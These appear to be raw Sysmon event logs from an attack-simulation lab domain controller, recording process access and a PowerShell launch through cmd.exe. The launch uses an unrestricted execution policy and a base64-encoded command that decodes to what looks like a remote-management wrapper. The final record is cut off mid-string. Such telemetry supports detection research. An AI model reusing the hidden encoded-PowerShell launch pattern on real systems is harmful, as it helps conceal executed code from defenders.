{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nTargetProcessId: 1640\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-0010B6C50600}","TargetProcessId":"1640","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4544,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.743\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001085C60600}\r\nProcessId: 4168\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nParentProcessId: 1640\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.743","ProcessGuid":"{41C8662E-20BF-5F25-0000-001085C60600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BF-5F25-0000-0010B6C50600}","ParentProcessId":"1640","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkA